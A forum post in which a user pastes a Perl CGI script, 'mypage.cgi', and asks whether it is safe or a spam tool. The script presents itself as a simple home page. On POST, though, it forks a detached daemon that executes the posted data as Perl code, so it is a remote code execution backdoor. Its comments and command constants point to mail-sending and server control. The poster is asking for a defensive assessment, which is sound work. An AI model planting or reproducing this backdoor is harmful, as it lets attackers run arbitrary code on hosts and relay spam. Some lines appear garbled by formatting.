CGI Script
Heres some of the code: #!/usr/bin/perl
#-----------------------------------------------------------------------------
#
# mypage.cgi - Just a simple script to put up a simple home page...
#
# Version Date Comments
# 0.1 07/06/00 Initial version
# 0.2 07/07/00 Modify to accept input from STDIN (post data)
# 0.3 07/08/00 Fix fork to leave child as a daemon
# 0.4 07/09/00 Add code to check back doors and ensure only one is running
# 0.5 07/10/00 Adjust output to make DP happy.
# 0.6 07/11/00 Add support for submit3 script
# 1.0 10/07/00 Simplify to just fork a child with the code uploaded.
# 1.1 10/21/00 Add code to grab IP address from poster and pass to fork.
# 1.2 10/25/00 Return cgi_to_ctrl_post structure instead of OK= ASCII stuff
# 1.3 01/02/01 Send IP of poster as parameter to fork if incoming IP = 0.0.0.0
#
#-----------------------------------------------------------------------------
use POSIX qw(setsid);
use Socket;
# Initialize Constants
$C_OK = 1000;
$C_INVALID_SITEID = 1000;
$C_SERVER_TIMEOUT = 1001;
$C_SERVER_IS_SLOW = 1002;
$C_THREAD_STARTED_CMD = 2000; # Set ulSiteID to 0
$C_MAIL_DONE_CMD = 2001;
$C_MAIL_SPEC_CMD = 2002;
$C_NEW_SERVER_CMD = 2003;
$C_AVAIL_IPS_CMD = 2004;
my $InRawData = 0;
# First get data passed in to the CGI
if ($ENV{'REQUEST_METHOD'} eq "POST")
{
read (STDIN, $InRawData, $ENV{'CONTENT_LENGTH'});
}
elsif ($ENV{'REQUEST_METHOD'} eq "GET")
{
DisplayPage();
exit(0);
}
else # Someone is messing with us, we only expect POST or GET
{
PrintError();
exit(0);
}
# Pull out special flags if Proxy added info
if (!($InRawData =~ s/<-=!=->(.*)<-=!=->/ $1/))
{
$InRawData .= " $ENV{'REMOTE_ADDR'}"; # no proxy, append sender's IP address
}
$Status = ForkIt ($InRawData);
PrintStatus($Status); # send back the status
exit(0);
sub PrintError
{
print "Content-type: text/html\n\n";
print "<html>\n<head><title>Invalid Invocation</title></head>\n";
print "<body>\n";
print "<br><center>You are coming from IP $ENV{'REMOTE_ADDR'}<BR>";
print "<br>Buffer = $InRawData<br>";
print "<br>Please stop messing around with this CGI!<br>\n";
print "</body></html>\n\n";
return;
}
sub PrintStatus
{
my $InStatus = shift;
my $ulSiteID = 0;
# Create cgi_to_ctrl_post structure for return
my $ulCmd = pack "N", $C_THREAD_STARTED_CMD;
if ($InStatus eq "OK=Success")
{
$ulSiteID = pack "N", 0;
}
else
{
$ulSiteID = pack "N", \xFFFF;
}
print "Content-type: application/octet-stream\n\n";
print "$ulCmd$ulSiteID";
return;
}
sub ForkIt
{
my $ForkData = shift;
my $ReturnStatus = 0;
FORK:
{
if ($pid = fork)
{
return ("OK=Success");
}
elsif (defined $pid) # second level child code
{
$NewSID = POSIX:
etsid();# close STD file handles so parent can die peacefully
close STDIN;
close STDOUT;
close STDERR;
exec "perl -e $ForkData"; # launch script
exit(0)
}
elsif ($! =~ /No more process/)
{
sleep 5;
redo FORK;
}
else
{
$ReturnStatus = "ERROR=Fork failed - $!";
}
}
return ($ReturnStatus);
}
sub DisplayPage
{
print "Content-type: text/html\n\n";
print "<html>\n<head><title>My Home Page</title></head>\n";
print "<body>\n";
print "<H1><center>Welcome to my Home Page!</H1>";
print "<br>I'm still working on it but I know that you are coming from IP $ENV{'REMOTE_ADDR'}<BR>";
print "</body></html>\n\n";
return;
}
I got a report from another company that this guy has been using mail scripts. Any ideas if this is a safe script, or if this guy is attempting to do some spam.
Thanks,
Reddrake
